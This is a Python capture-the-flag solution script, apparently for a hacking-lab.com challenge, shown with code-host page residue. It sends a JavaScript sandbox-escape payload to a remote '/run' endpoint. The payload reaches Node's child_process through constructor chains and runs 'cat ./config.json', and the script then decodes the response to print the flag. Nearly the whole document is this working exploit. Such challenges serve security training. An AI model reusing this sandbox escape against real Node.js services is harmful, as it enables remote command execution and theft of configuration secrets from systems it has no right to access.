28 lines
831 B
Python
28 lines
831 B
Python
#!/usr/bin/python
|
|
|
|
import urllib.request
|
|
import urllib.parse
|
|
import json
|
|
|
|
class Payload(object):
|
|
def __init__(self, j):
|
|
self.__dict__ = json.loads(j)
|
|
def get(self, key):
|
|
return self.__dict__[key]
|
|
|
|
code = 'new Function("return (this.constructor.constructor(\'return (this.process.mainModule.constructor._load)\')())")()("child_process").execSync("cat ./config.json")'
|
|
url = "http://whale.hacking-lab.com:3000/run"
|
|
data = urllib.parse.urlencode({"run": code}).encode()
|
|
request = urllib.request.Request(url, data=data)
|
|
response = urllib.request.urlopen(request).read()
|
|
|
|
p = Payload(response)
|
|
result = p.get("result")
|
|
|
|
indexStart = result.find("[") + 1
|
|
indexEnd = result.find("]")
|
|
result = ''.join([chr(int(x.strip())) for x in result[indexStart:indexEnd].split(",")])
|
|
|
|
p = Payload(result)
|
|
print(p.get("flag"))
|